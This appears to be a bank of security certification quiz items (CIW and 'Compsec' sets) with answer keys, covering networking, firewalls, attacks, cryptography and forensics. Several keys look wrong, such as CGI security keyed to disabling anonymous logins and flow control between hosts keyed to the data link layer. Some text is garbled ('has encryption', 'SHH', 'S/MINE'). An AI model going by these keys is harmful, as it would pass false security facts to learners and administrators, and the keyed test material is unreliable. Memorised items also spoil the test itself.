A#CIW Q71. What is the name of the risk assessment stage in which you bypass login accounts and passwords?^A: Penetration	^B: Control	^C: Activation	^D: Discovery
D#CIW Q72. Which tool, command or service allows a remote or local user to find any open connection paths to the system on the Internet or an intranet?	^A: Traceroute	^B: Whois	^C: Nslookup	^D: Port scanner
B#CIW Q73. A hacker has just changed the information for a zone during a zone transfer. This attack caused false information to be passed on to network hosts as if it were legitimate. Which type of server is the target in such an attack?	^A: An e-mail server	^B: A DNS server	^C: A router	^D: A FTP server
C#CIW Q74. Which of the following do hackers target because it usually communicates in Cleartext?	^A: Router	^B: DNS server	^C: FTP server	^D: E-mail server
B#CIW Q75. Which directory holds the Microsoft NT operating system on an NT 4.0 server (using default installation)?	^A: \windows	^B: \winnt	^C: \winnt4.0	^D: \program files
C#CIW Q76. Where are most of the binaries located on the hard drive of a UNIX server (using default installation)?	^A: /bin	^B: /sbin	^C: /usr	^D: /proc
A#CIW Q77. Ulf is a systems administrator. He sees that an attacker from a remote location is sending invalid packets, trying to monopolize Ulfs connection so that a denial of service occurs. What characteristic of the activity makes Ulf think this is a denial-of-service attack?	^A: Bandwidth consumption	^B: Hijacking of internal user resources	^C: Polling	^D: Use of an illicit server
B#CIW Q78. Which application is used to learn about an operating systems type and patch level?^A: Traceroute	^B: Nmap	^C: Whois	^D: Ping
D#CIW Q79. You have installed a proxy server that authenticates users. However, you find that one user has bypassed the proxy server by entering the default gateway IP address. How can you solve this problem?	^A: Configure the default gateway to deny access to all systems	^B: Confront the user	^C: Reconfigure the users machine	^D: Configure the default gateway to reject all requests to all systems except for the proxy server
B#CIW Q80. What is the standard method for securing individual e-mail messages sent between a company and other users that do not use that e-mail server?	^A: Invoke encryption at the e-mail server	^B: Invoke encryption on each client	^C: Filter firewall port 42 on the company firewall	^D: Store all e-mail messages on a separate partition
D#CIW Q81. Which one of the following choices lists the two greatest security problems associated with HTTP?	^A: Community names and encrypted passwords	^B: IP spoofing and ICMP spoofing	^C: Viewer applications and external programs used by the HTTP server	^D: No bound checking on arrays and anonymous access
B#CIW Q82. Which tool utilizes a database of known security problems to test a network?	^A: Operating system add-on	^B: Network scanner	^C: Logging and log analysis tool	^D: SNMP
B#CIW Q83. How are servers able to conduct a simple authentication check using DNS?	^A: Forward DNS lookup	^B: Reverse DNS lookup	^C: RARP	^D: Nslookup
B#CIW Q84. Which port or ports are used for SMTP?	^A: 20 and 21	^B: 25	^C: 53	^D: 161 and 162
A#CIW Q85. When using IIS, what has primary control over security?	^A: The operating system	^B: IIS	^C: The GINA	^D: The SSL Service
B#CIW Q86. Which of the following is the best way to secure CGI scripts?	^A: Configure the firewall to filter CGI at ports 80 and 443	^B: Disable anonymous HTTP logins when using CGI	^C: Ensure that the code checks all user input	^D: Active Java on the primary web server
B#CIW Q87. Which type of gateway functions in all layers of the OSI/RM?	^A: A circuit-level gateway	^B: An application-level gateway	^C: A proxy gateway	^D: A universal gateway
A#CIW Q88. Which device is similar to a packet filter, but also provides network address translation?	^A: A circuit-level gateway	^B: An application-level gateway	^C: A proxy server	^D: A choke router
B#CIW Q89. Which of the following attacks specifically utilizes packet spoofing?	^A: Crack	^B: Smurf	^C: Flood	^D: Worm
B#CIW Q90. Tavo wants to check the status of failed Telnet-based login attempts on a Linux machine he administers. Which shell command can he use to see only that information?	^A: cat/etc/passwd> newfile.txt	^B: grep login/var/log/messages	^C: more /var/log/secure	^D: more /etc/passwd
A#CIW Q91. Why is the rlogin command dangerous to network security?	^A: Remote logins are a security threat regardless of the protocol and should be avoided	^B: There is no way to prevent the user from becoming root if he successfully uses rlogin	^C: The rlogin command has a history of buffer overflows that has not been corrected	^D: The rlogin command relies on IP-based authentication, which is easily defeated
C#CIW Q92. Which of the following is the most desirable goal that UNIX system crackers typically hope to achieve?	^A: To be able to write a message on the compromised computers web page	^B: To be able to plant a virus that will wipe out the entire database	^C: To gain root privileges	^D: To alter the /var/log/messages file and thus escape detection
A#CIW Q93. What is the purpose of blocking services on any given server?	^A: To limit the number of targets a cracker can choose from	^B: To limit the number of processes that run at any given time, enhancing response time in case of a security breach	^C: To keep the operating system and its processes as simple as possible so administration is easier	^D: None; most services are needed and pose only minor security threats
B#CIW Q94. What is the primary function of IPSec?	^A: It thwarts denial-of-service attacks	^B: It provides encryption	^C: It authenticates users	^D: It provides access control
A#CIW Q95. When setting up Microsoft Internet Information Server (IIS) in either Windows NT or Windows 2000, what should you change to help provide security?	^A: The default accounts must be renamed because they pose a security problem	^B: The domain controller must be queried for the default encryption for the user database	^C: The administrator must import default admin profiles for secure administration rights	^D: The default users must be trained in the errata and security features of internet information manager
B#CIW Q96. Helga is going to log on to her network. Her network does not employ traffic padding mechanisms. Why will it be easy for someone to steal her password?	^A: Because her password could be more than two weeks old	^B: Because of the predictability of the login length and password prompts	^C: Because the cleartext user name and password are not encrypted	^D: Because there is no provision for log analysis without traffic padding, thus no accountability when passwords are lost
B#CIW Q97. Why would a Windows NT/2000 administrator place the operating system, the program files and the data on different, discrete directories?	^A: To avoid confusion and duplication of upgrades between applications and the operating system	^B: To enhance security by modifying permissions for each resource as needed	^C: To restrict users from accidentally overwriting critical files (if they fill their home directories to capacity), which makes the operating system vulnerable to hacker attacks	^D: To keep the operating system partition from becoming overwhelmed with user program libraries and DLLs
D#CIW Q98. Which layer of the OSI/RM do proxy servers usually address?	^A: Physical layer	^B: Network layer	^C: Transport layer	^D: Application layer 
C#CIW Q99. At which layer of the OSI/RM do packet filters function?	^A: Data link layer	^B: Physical layer	^C: Network layer	^D: Transport layer
B#CIW Q100. Helga deleted extraneous services from a system to ensure that it is relatively secure from attack. Which term best describes this activity?	^A: Securing the system	^B: Operating system hardening	^C: Auditing	^D: System maintenance
C#CIW Q101. Lucy is a system administrator who wants to block all NNTP traffic between her network and the Internet. How should she configure her firewall?	^A: Configure the firewall to block all incoming and outgoing packets except for those with the source and destination port of 119. Then, allow all traffic with destination ports above 1024 to transverse the firewall.	^B: Configure the firewall to block all incoming packets with the source port of 119, and outgoing packets with a source port lower than 1024. Then, block all packets with the destination port of 119 and with a source port lower than 1024.	^C: Configure the firewall to block incoming packets with the destination port of 119, and to block outgoing packets with the destination port of 119.	^D: Configure the firewall to block all incoming packets with the source port of 119.
B#CIW Q102. Which port is used by HTTP to listen for secure connections?	^A: UDP 80	^B: TCP 443	^C: TCP 8080	^D: UDP 8080
B#CIW Q103. Raul is worried that his network might be attacked through modified ICMP messages. What can he do to prevent this?	^A: Disable anonymous logins	^B: Filter ICMP packets at the firewall	^C: Configure the firewall to block zone transfers	^D: Scan ICMP messages for viruses at the firewall
A#CIW Q104. Which layer of the OSI/RM stack controls the flow of information between hosts?	^A: Data link layer	^B: Physical layer	^C: Network layer	^D: Transport layer
D#CIW Q105. What is the most important step in securing a web server?	^A: Logging all HTTP activity	^B: Enabling system-wide encryption	^C: Placing the operating system, web server program, and server files on the same partition	^D: Placing the operating system, web server program, and server files on separate partitions
D#CIW Q106. You have enabled Tripwire on your Linux system. Which location is best for storing the database file?	^A: On a CD-RW drive attached to the system	^B: In the default location	^C: On a write-protected floppy disk attached to the system	^D: On a CD-R drive attached to the system
D#CIW Q107. After installing a Linux server and activating SSH on it, you try to authenticate, but are rejected due to an authenticated failure. You have properly transferred host and public keys, and all of your servers use the same flavor of SSH (Open SSH). What is a likely cause for your failure to connect to this newly configured server?	^A: The version of SSH you are using is incompatible with your Linux system	^B: You must first conduct a Telnet session with the server	^C: You must first disable Telnet and rlogin for SSH to work properly	^D: Your name resolution is incorrectly configured
B#CIW Q108. What is another term for a network security manager who acts as a potential hacker (a person looking for security loopholes)?	^A: An agent	^B: An auditor	^C: An assessor	^D: An analyzer
A#CIW Q109. Helga is a systems administrator. She sees that an attacker from a remote location is sending invalid packets, trying to monopolize Helgas network connection so that a denial of service occurs. What characteristic of the activity makes Helga think this is a denial-of-service attack?	^A: Bandwidth consumption	^B: Hijacking of internal user resources	^C: Use of an illicit server	^D: System slowdown
A#CIW Q110. What is the most secure policy for a firewall?	^A: To reject all traffic unless it is explicitly permitted	^B: To accept all traffic unless it is explicitly rejected	^C: To enable all internal interfaces	^D: To enable all external interfaces
C#CIW Q111. Which of the following do hackers target because it usually communicates in cleartext, and because it often carries sensitive information?	^A: Router	^B: DNS server	^C: FTP server	^D: E-mail server
B#CIW Q112. What can a hacker destroy or modify to make a server or network intrusion undetectable?	^A: User accounts	^B: Log files	^C: Operating systems	^D: Passwords
D#CIW Q113. Which of the following targets is more vulnerable to hacking attacks because of its location in relation to the firewall?	^A: DNS server	^B: FTP server	^C: E-mail server	^D: Router
D#CIW Q114. Helgas web server is placed behind her corporate firewall. Currently, her firewall allows only VPN connections from other remote clients and networks. She wants to open the internet-facing interface on her firewall so that it allows all users on the Internet to access her web server. Which of the following must Helgas rule contain?	^A: Instructions allowing all UDP connections with a destination port of 80 and a source port of 1024	^B: Instructions allowing all UDP connections with a source port of 80 on the external interface and a destination port of 1024	^C: Instructions allowing all TCP connections with a source port of 80 on the internal interface and a destination port of 80	^D: Instructions allowing all TCP connections with a source port higher than 1024 and a destination port of 80
C#CIW Q115. When assessing the risk to a machine or network, what step should you take first?	^A: Analyzing, categorizing and prioritizing resources	^B: Evaluating the existing perimeter and internal security	^C: Checking for a written security policy	^D: Analyzing the use of existing management and control architecture
A#CIW Q116. Your company has suffered several denial-of-service attacks involving Microsoft Outlook e-mail clients. How can you protect your systems from such attacks in the future, yet still allows client users to accomplish their jobs?	^A: Install antivirus applications on the clients and the e-mail server	^B: Filter out all attachments from e-mail messages at the e-mail server	^C: Filter out all attachments from e-mail messages at the e-mail server, and install antivirus applications on the clients	^D: Install personal firewalls in the e-mail server and on each client
C#CIW Q117. Which type of device communicates with external servers on behalf of internal clients?	^A: A client-level gateway	^B: An application-level gateway	^C: A proxy server	^D: A packet filter
C#CIW Q118. Which choice lists the components that form security descriptors for Windows NT/200 objects?	^A: The user name (UNAME), the password (PWD), and the object-owner security identifier (SID)	^B: The UNAME, the access profile of the object-owner SID, and confirmation by the system access control list (SACL)	^C: The object-owner SID, the discretionary access control list (DACL), the SACL, and the group SID	^D: The user name, the object identifier (OID), the set user identifier (UID), and the time/date stamp
D#CIW Q119. Which single service can you disable to stop approximately two-thirds of the exploration tools used against Windows NT/2000?	^A: The Schedule service.	^B: The POSIX subsystem with the C2Config tool.	^C: The Ansi.sys from the boot loader.	^D: The NetBIOS service.
C#CIW Q120. Which is included in the formula that Windows NT/2000 uses to create the Security Identifier?	^A: A semi-random number generated by the CPU based on the number of processes in the queue	^B: A set of numbers based on the serial number of the computer CPU and the serial number of Windows NT	^C: The computer name and the current amount of CPU time used by the user mode	^D: The octal encryption of the user name and the password
C#CIW Q121. A computer on your network is responding very slowly to network requests, and then it stops responding at all.You use a packet sniffer and create a filter that views packets being sent to that host. You see that the host is receiving thousands of ICMP packets a minute. What type of attack is causing the system to slow down?	^A: A spoofing attack	^B: A root kit installed on the system	^C: A denial-of-service attack	^D: A man-in-the-middle attack
C#CIW Q122. What is typically the most desirable asset for a hacker to obtain from a company or department?	^A: E-mail messages	^B: Router tables	^C: Database information	^D: DNS server records
A#CIW Q123. Which service, tool or command provides information about administrators, domain name servers, additional domains and physical locations?	^A: Whois	^B: Ping scanner	^C: Host	^D: Traceroute
A#CIW Q124. Your IDS application pages you at 3:00^A:m, and informed you that an attack occurred against your DNS server. You drive to the server site to investigate. You find no evidence of an attack, although the IDS application claims that a remote DNS server waged an attack on port 53 of your intranet DNS server. You check the logs and discover that a zone transfer has occurred. You check your zones and name resolution, and discover that all entries exist, and no unusual entries have been added to the database. What has most likely occurred?	^A: A DNS poisoning attack against your internal DNS server.	^B: A denial-of-service attack against your internal DNS server.	^C: A false positive generated by the IDS.	^D: A malfunction of the internal name server.
D#CIW Q125. Which of the following is a potential security risk when using CGI scripts?	^A: CGI scripts can contain viruses that can be used against your system.	^B: Compromised CGI scripts are often used in packet spoofing because they do not check packets that generate.	^C: CGI scripts can create broadcast storms on the local network.	^D: Remote user input can be used to execute local commands.
B#CIW Q126. Which choice best defines the Windows NT Security Account Manager?	^A: The portion of the GINA.DLL that controls security	^B: The database containing the identities and credentials of users	^C: The name of the machine responsible for management of all security on the LAN	^D: The interface that is responsible for logging on and user IDs
A#CIW Q127. Lucy wants to ensure that her Windows NT Server 4.0 and Windows 2000 systems do not incur any unauthorized changes. What can she do to help secure her registry from changes?	^A: Lock the registry so that it cannot be written to by any application.	^B: Enable auditing.	^C: Back up the registry.	^D: Configure the registry so that it does not change.
A#CIW Q128. Andreas wants to choose a strong password for his computer. Which of the following should he include for his password?	^A: A mixture of uppercase and lowercase letters, symbols and numbers.	^B: An arcane phrase only he can remember.	^C: An incorrect spelling of a word or a phrase.	^D: A mixture of random words that form non-sense.
B#CIW Q129. What is the essential element in the implementation of any security plan?	^A: Testing to make sure any server-side scripts are secure	^B: Testing patch levels	^C: Proper firewall configuration	^D: Auditing
D#CIW Q130. A malicious user has connected to your system and learned the specifics of your operating system, including its current patch levels and the operating system name. What is the term for this type of scanning attack?	^A: SYN detection	^B: TCP priming	^C: Cache poisoning	^D: Stack fingerprinting
C#CIW Q131. Which type of attack causes a remote host to crash because it cannot respond to any new TCP connection requests?	^A: Crack attack	^B: Smurf attack	^C: SYN flood	^D: ICMP flood
B#CIW Q132. Tavo wants to improve the security on his FTP server. He is especially worried about password-sniffing attacks. Which of the following is the best action for Tavo to take?	^A: Disable anonymous logins.	^B: Allow only anonymous logins.	^C: Configure the firewall to block port 21.	^D: Place the FTP server outside of the firewall.
A#CIW Q133. Raul wants to know where to find encrypted passwords in a secured Linux server. Where is this information located on the hard drive?	^A: /etc/shadow	^B: /etc/passwd	^C: / secure/etc/shadow	^D: /etc/security/shadow
D#CIW Q134. In which risk assessment stage does the security auditor map the systems and resources on a network?	^A: Penetration	^B: Cancellation	^C: Activation	^D: Discovery
A#CIW Q135. You installed SSH on an older Linux server. You want to allow users to authenticate securely. Which choice lists two actions that must occur first?	^A: Public keys must first be exchanged to enable data encryption, and then the system exchange hostkeys to enable authentication without passwords.	^B: The system must exchange host keys to enable data encryption, and individual users must exchange public keys to enable authentication without passwords.	^C: A key pair must be obtained from a CA to enable data encryption, then host keys must be exchanged to enable authentication.	^D: A key pair must be obtained from a CA to enable authentication, then host keys must be exchanged to enable data encryption.
C#CIW Q136. You want to secure your SMTP transmissions from sniffing attacks. How can you accomplish this?	^A: Forbid relaying.	^B: Enforce masquerading.	^C: Use an SSL certificate.	^D: Use strict bounds checking on arrays.
B#Compsec Q1. The best protection against the abuse of remote maintenance of PBX (Private Branch Exchange) system is to: 	^A. Keep maintenance features turned off until needed 	^B. Insists on strong authentication before allowing remote maintenance 	^C. Keep PBX (Private Branch Exchange) in locked enclosure and restrict access to only a few people. 	^D. Check to see if the maintenance caller is on the list of approved maintenance personnel 
B#Compsec Q2. A high profile company has been receiving a high volume of attacks on their web site. ^  The network administrator wants to be able to collect information on the attacker(s) so legal action can be taken. ^   What should be implemented? 	^A. A DMZ (Demilitarized Zone) 	^B. A honey pot 	^C. A firewall 	^D. A new subnet 
A#Compsec Q3. The protection of data against unauthorized access or disclosure is an example of what? 	^A. Confidentiality 	^B. Integrity 	^C. Signing 	^D. Hashing 
D#Compsec Q4. You are running cabling for a network through a boiler room where the furnace and some other heavy machinery reside. You are concerned about interference from these sources. ^  Which of the following types of cabling provides the best protection from interference in this area? 	^A. STP 	^B. UTP 	^C. Coaxial 	^D. Fiber-optic 
B#Compsec Q5. In order for a user to obtain a certificate from a trusted CA (Certificate Authority), the user must present proof of identity and a: 	^A. Private key 	^B. Public key 	^C. Password 	^D. Kerberos key 
C#Compsec Q6. If a private key becomes compromised before its certificates normal expiration, X509 defines a method requiring each CA (Certificate Authority) to periodically issue a signed data structure called a certificate: 	^A. Enrollment list 	^B. Expiration list 	^C. Revocation list 	^D. Validation list 
D#Compsec Q7. An application that appears to perform a useful function but instead contains some sort of malicious code is called a _____. 	^A. Worm 	^B. SYN flood 	^C. Virus 	^D. Trojan Horse 	^E. Logic Bomb 
C#Compsec Q8. How many bits are employed when using has encryption? 	^A. 32 	^B. 64 	^C. 128 	^D. 256 
A#Compsec Q9. What transport protocol and port number does SHH (Secure Shell) use? 	^A. TCP (Transmission Control Protocol) port 22 	^B. UDP (User Datagram Protocol) port 69 	^C. TCP (Transmission Control Protocol) port 179 	^D. UDP (User Datagram Protocol) port 17 
F#Compsec Q10. While performing a routing site audit of your wireless network, you discover an unauthorized Access Point placed on your network under the desk of Accounting department security. ^   When questioned, she denies any knowledge of it, but informs you that her new boyfriend has been to visit her several times, including taking her to lunch one time. ^  What type of attack have you just become a victim of? ^A. SYN Floo^D. 	^B. Distributed Denial of Service. 	^C. Man in the Middle attack. 	^D. TCP Floo^D. 	^E. IP Spoofing. 	^F. Social Engineering 	^G. Replay attack 	^H. Phone tag 	^I. Halloween attack 
D#Compsec Q11. When visiting an office adjacent to the server room, you discover the lock to the window is broken. ^   Because it is not your office you tell the resident of the office to contact the maintenance person and have it fixed. After leaving, you fail to follow up on whether the windows was actually repaired. ^  What affect will this have on the likelihood of a threat associated with the vulnerability actually occurring? 	^A. If the window is repaired, the likelihood of the thread occurring will increase. 	^B. If the window is repaired, the likelihood of the threat occurring will remain constant. 	^C. If the window is not repaired the, the likelihood of the threat occurring will decrease. 	^D. If the window is not repaired, the likelihood of the threat occurring will increase. 
B#Compsec Q12. Providing false information about the source of an attack is known as: 	^A. Aliasing 	^B. Spoofing 	^C. Flooding 	^D. Redirecting 
B#Compsec Q13. The start of the LDAP (Lightweight Directory Access Protocol) directory is called the: 	^A. Head 	^B. Root 	^C. Top 	^D. Tree 
B#Compsec Q15. You are explaining SSL to a junior administrator and come up to the topic of handshaking. How many steps are employed between the client and server in the SSL handshake process? 	^A. Five 	^B. Six 	^C. Seven 	^D. Eight 
C#Compsec Q16. An administrator notices that an e-mail server is currently relaying e-mail (including spam) for any e-mail server requesting relaying. ^  Upon further investigation the administrator notices the existence of /etc/mail/relay domains. ^   What modifications should the administrator make to the relay domains file to prevent relaying for non-explicitly named domains? 	^A. Move the .* entry to the bottom of the relay domains file and restart the e-mail process. 	^B. Move the .* entry to the top of the relay domains file and restart the e-mail process. 	^C. Delete the .* entry in the relay domains file and restart the e-mail process. 	^D. Delete the relay domains file from the /etc/mail folder and restart the e-mail process. 
B#Compsec Q17. Access control decisions are based on responsibilities that an individual user or process has in an organization. ^   This best describes: 	^A. MAC (Mandatory Access Control) 	^B. RBAC (Role Based Access Control) 	^C. DAC (Discretionary Access Control) 	^D. None of the above. 
A#Compsec Q18. A honey pot is _____. 	^A. A false system or network to attract attacks away from your real network. 	^B. A place to store passwords. 	^C. A sage haven for your backup media. 	^D. Something that exist only in theory. 
C#Compsec Q19. A problem with air conditioning is causing fluctuations in temperature in the server room. ^   The temperature is rising to 90 degrees when the air conditioner stops working, and then drops to 60 degrees when it starts working again. The problem keeps occurring over the next two days. ^  What problem may result from these fluctuations? (Select the best answer) 	^A. Electrostatic discharge 	^B. Power outages 	^C. Chip creep 	^D. Poor air quality 
D#Compsec Q20. You have been alerted to the possibility of someone using an application to capture and manipulate packets as they are passing through your network. ^   What type of threat does this represent? 	^A. DDos 	^B. Back Door 	^C. Spoofing 	^D. Man in the Middle 
B#Compsec Q21. Which of the following media types is most immune to RF (Radio Frequency) eavesdropping?	^A. Coaxial cable	^B. Fiber optic cable	^C. Twisted pair wire 	^D. Unbounded 
A#Compsec Q22. What statement is most true about viruses and hoaxes? 	^A. Hoaxes can create as much damage as a real virus. 	^B. Hoaxes are harmless pranks and should be ignored. 	^C. Hoaxes can help educate user about a virus. 	^D. Hoaxes carry a malicious payload and can be destructive. 
E#Compsec Q24. A piece of malicious code that can replicate itself has no productive purpose and exist only to damage computer systems or create further vulnerabilities is called a? 	^A. Logic Bomb 	^B. Worm 	^C. Trojan Horse 	^D. SYN flood 	^E. Virus 
B#Compsec Q25. When evidence is acquired, a log is started that records who had possession of the evidence for a specific amount of time. ^  This is to avoid allegations that the evidence may have been tampered with when it was unaccounted for, and to keep track of the tasks performed in acquiring evidence from a piece of equipment or materials. ^  What is the term used to describe this process? 	^A. Chain of command. 	^B. Chain of custody. 	^C. Chain of jurisdiction. 	^D. Chain of evidence. 
C#Compsec Q26. Data integrity is best achieved using a(n) 	^A. Asymmetric cipher 	^B. Digital certificate 	^C. Message digest 	^D. Symmetric cipher 
B#Compsec Q27. A recent audit shows that a user logged into a server with their user account and executed a program. ^  The user then performed activities only available to an administrator. ^ This is an example of an attack? 	^A. Trojan horse 	^B. Privilege escalation 	^C. Subseven back door 	^D. Security policy removal 
A#Compsec Q28. When a user clicks to browse a secure page, the SSL (Secure Sockets Layer) enabled server will first: 	^A. Use its digital certificate to establish its identity to the browser. 	^B. Validate the user by checking the CRL (Certificate Revocation List). 	^C. Request the user to produce the CRL (Certificate Revocation List). 	^D. Display the requested page on the browser, then provide its IP (Internet Protocol) address for verification 
D#Compsec Q29. You are assessing risks and determining which asset protection policies to create first. ^  Another member of the IT staff has provided you with a list of assets which have importance weighted on a scale of 1 to 10. Internet connectivity has an importance of 8, data has an importance of 9, personnel have an importance of 7, and software has an importance of 5. ^  Based on the weights, what is the order in which you will generate new policies? 	^A. Internet policy, data security, personnel safety policy, software policy. 	^B. Data security policy, Internet policy, software policy, personnel safety policy. 	^C. Software policy, personnel safety policy, Internet policy, data security policy. 	^D. Data security policy, Internet policy, personnel safety policy, software policy. 
C#Compsec Q30. Controlling access to information systems and associated networks is necessary for the preservation of their: 	^A. Authenticity, confidentiality, integrity and availability. 	^B. Integrity and availability. 	^C. Confidentiality, integrity and availability. 	^D. Authenticity, confidentiality and availability. 
A#Compsec Q31. What design feature of Instant Messaging makes it extremely insecure compared to other messaging systems? 	^A. It is a peer-to-peer network that offers most organizations virtually no control over it. 	^B. Most IM clients are actually Trojan Horses. 	^C. It is a centrally managed system that can be closely monitored. 	^D. It uses the insecure Internet as a transmission medium. 
D#Compsec Q32. Access controls that are created and administered by the data owner are considered: 	^A. MACs (Mandatory Access Control) 	^B. RBACs (Role Based Access Control) 	^C. LBACs (List Based Access Control) 	^D. DACs (Discretionary Access Control) 
D#Compsec Q33. A well defined business continuity plan must consist of risk and analysis, business impact analysis, strategic planning and mitigation, training and awareness, maintenance and audit and: 	^A. Security labeling and classification. 	^B. Budgeting and acceptance. 	^C. Documentation and security labeling. 	^D. Integration and validation. 
A#Compsec Q34. John wants to encrypt a sensitive message before sending it to one of his managers. Which type of encryption is often used for e-mail? 	^A. S/MINE 	^B. BIND 	^C. DES 	^D. SSL 
A#Compsec Q35. What is the greatest benefit to be gained through the use of S/MINE /Secure Multipurpose Internet Mail Extension) The ability to: 	^A. Encrypted and digitally sign e-mail messages. 	^B. Send anonymous e-mails. 	^C. Send e-mails with a return receipt. 	^D. Expedite the delivery of e-mail. 
B#Compsec Q36. A _____ occurs when a string of data is sent to a buffer that is larger than the buffer was designed to handle. 	^A. Brute Force attack	^B. Buffer owerflow 	^C. Man in the middle attack 	^D. Blue Screen of Death 	^E. SYN flood 	^F. Spoofing attack 
C#Compsec Q37. Packet sniffing can be used to obtain username and password information in clear text from which one of the following? 	^A. SSH (Secure Shell) 	^B. SSL (Secure Sockets Layer) 	^C. FTP (File Transfer Protocol) 	^D. HTTPS (Hypertext Transfer Protocol over Secure Sockets Layer) 
D#Compsec Q38. A company uses WEP (Wired Equivalent Privacy) for wireless security. Who may authenticate to the companys access point? 	^A. Only the administrator. 	^B. Anyone can authenticate. 	^C. Only users within the company. 	^D. Only users with the correct WEP (Wired Equivalent Privacy) key. 
B#Compsec Q39. As the Security Analyst for your companies network, you become aware that your systems may be under attack. ^  This kind of attack is a DOS attack and the exploit send more traffic to a node than anticipated. What kind of attack is this? 	^A. Ping of death 	^B. Buffer Overflow 	^C. Logic Bomb 	^D. Smurf 
A#Compsec Q40. Following a disaster, while returning to the original site from an alternate site, the first process to resume at the original site would be the: 	^A. Least critical process 	^B. Most critical process. 	^C. Process most expensive to maintain at an alternate site. 	^D. Process that has a maximum visibility in the organization. 
B#Compsec Q41. In order to establish a secure connection between headquarters and a branch office over a public network, the router at each location should be configured to use IPSec (Internet Protocol Security) in ______ mode. 	^A. Secure 	^B. Tunnel 	^C. Transport 	^D. Data link 
B#Compsec Q42. The primary purpose of NAT (Network Address Translation) is to: 	^A. Translate IP (Internet Protocol) addresses into user friendly names. 	^B. Hide internal hosts from the public network. 	^C. Use on public IP (Internet Protocol) address on the internal network as a name server. 	^D. Hide the public network from internal hosts. 
C#Compsec Q43. Users of Instant Messaging clients are especially prone to what? 	^A. Theft of root user credentials. 	^B. Disconnection from the file server. 	^C. Hostile code delivered by file transfer. 	^D. Slow Internet connections. 	^E. Loss of email privileges. 	^F. Blue Screen of Death errors. 
A,B#Compsec Q44. Which two of the following are symmetric-key algorithms used for encryption? 	^A. Stream-cipher 	^B. Block 	^C. Public 	^D. Secret 
B#Compsec Q45. Computer forensics experts collect and analyze data using which of the following guidelines so as to minimize data loss? 	^A. Evidence 	^B. Chain of custody 	^C. Chain of command 	^D. Incident response 
C#Compsec Q46. A DMZ (Demilitarized Zone) typically contains: 	^A. A customer account database 	^B. Staff workstations 	^C. A FTP (File Transfer Protocol) server 	^D. A SQL (Structured Query Language) based database server 
B#Compsec Q47. What kind of attack is a type of security breach to a computer system that does not usually result in the theft of information or other security loss but the lack of legitimate use of that system? 	^A. CRL 	^B. DOS 	^C. ACL 	^D. MD2 
C#Compsec Q48. User A needs to send a private e-mail to User ^B. User A does not want anyone to have the ability to read the e-mail except for User B, thus retaining privacy. ^  Which tenet of information security is User A concerned about? 	^A. Authentication 	^B. Integrity 	^C. Confidentiality 	^D. Non-repudiation 
A#Compsec Q49. You are researching the ARO and need to find specific data that can be used for risk assessment. 	Which of the following will you use to find information? 	^A. Insurance companies 	^B. Stockbrokers 	^C. Manuals included with software and equipment. 	^D. None of the above. There is no way to accurately predict the ARO. 
A#Compsec Q50. Giving each user or group of users only the access they need to do their job is an example of which security principal. 	^A. Least privilege 	^B. Defense in depth 	^C. Separation of duties 	^D. Access control 
C#Compsec Q51. Documenting change levels and revision information is most useful for: 	^A. Theft tracking 	^B. Security audits 	^C. Disaster recovery 	^D. License enforcement 
A#Compsec Q52. One way to limit hostile sniffing on a LAN (Local Area Network is by installing: 	^A. An ethernet switch. 	^B. An ethernet hub. 	^C. A CSU/DSU (Channel Service Unit/Data Service Unit). 	^D. A firewall. 
D#Compsec Q53. Notable security organizations often recommend only essential services be provided by a particular host, and any unnecessary services be disable. Which of the following does NOT represent a reason supporting this recommendation? 	^A. Each additional service increases the risk of compromising the host, the services that run on the host, and potential clients of these services. 	^B. Different services may require different hardware, software, or a different discipline of administration. 	^C. When fewer services and applications are running on a specific host, fewer log entries and fewer interactions between different services are expected, which simplifies the analysis and maintenance of the system from a security point of view. 	^D. If a service is not using a well known port, firewalls will not be able to disable access to this port, and an administrator will not be able to restrict access to this service. 
B#Compsec Q54. Which of the following backup methods copies only modified files since the last full backup? 	^A. Full 	^B. Differential 	^C. Incremental 	^D. Archive 
B#Compsec Q55. You are compiling estimates on how much money the company could lose if a risk occurred one time in the future. Which of the following would these amounts represent? 	^A. ARO 	^B. SLE 	^C. ALE 	^D. Asset identification 
A#Compsec Q56. The term due care best relates to: 	^A. Policies and procedures intended to reduce the likelihood of damage or injury. 	^B. Scheduled activity in a comprehensive preventative maintenance program. 	^C. Techniques and methods for secure shipment of equipment and supplies. 	^D. User responsibilities involved when sharing passwords in a secure environment. 
B#Compsec Q57. Advanced Encryption Standard (AES) is an encryption algorithm for securing sensitive but unclassified material by U.S. Government agencies. ^  What type of encryption is it from the list below? 	^A. WTLS 	^B. Symmetric 	^C. Multifactor 	^D. Asymmetric 
A,B#Compsec Q58. You are the first person to respond to the scene of an incident involving a computer being hacked. ^  After determining the scope of the crime scene and securing it, you attempt to preserve evidence at the scene. ^  Which of the following tasks will you perform to preserve evidence? (Choose all that apply) 	^A. Photograph any information displayed on the monitors of computers involved in the incident. 	^B. Document any observation or messages displayed by the computer. 	^C. Shut down the computer to prevent further attacks that may modify data. 	^D. Gather up manuals, nonfunctioning devices, and other materials and equipment in the area so they are ready for transport. 
A#Compsec Q59. At what stage of an assessment would an auditor test systems for weaknesses and attempt to defeat existing encryption, passwords and access lists? 	^A. Penetration 	^B. Control 	^C. Audit planning 	^D. Discovery 
C#Compsec Q60. When examining the servers list of protocols that are bound and active on each network interface card, the network administrator notices a relatively large number of protocols. Which actions should be taken to ensure network security? 	^A. Unnecessary protocols do not pose a significant to the system and should be left intact for compatibility reasons. 	^B. There are no unneeded protocols on most systems because protocols are chosen during the installation. 	^C. Unnecessary protocols should be disable on all server and client machines on a network as they pose great risk. 	^D. Using port filtering ACLs (Access Control List) at firewalls and routers is sufficient to stop malicious attacks on unused protocols. 
B#Compsec Q61. Which of the following describes the concept of data integrity? 	^A. A means of determining what resources a user can use and view. 	^B. A method of security that ensures all data is sequenced, and numbered. 	^C. A means of minimizing vulnerabilities of assets and resources. 	^D. A mechanism applied to indicate a datas level of security. 
B#Compsec Q62. In a decentralized privilege management environment, user accounts and passwords are stored on: 	^A. One central authentication server. 	^B. Each individual server. 	^C. No more than two servers. 	^D. One server configured for decentralized management. 
A#Compsec Q63. In context of wireless networks, WEP (Wired Equivalent Privacy) was designed to: 	^A. Provide the same level of security as a wired LAN (Local Area Network). 	^B. Provide a collision preventive method of media access. 	^C. Provide a wider access area that that of wired LANs (Local Area Network). 	^D. Allow radio frequencies to penetrate walls. 
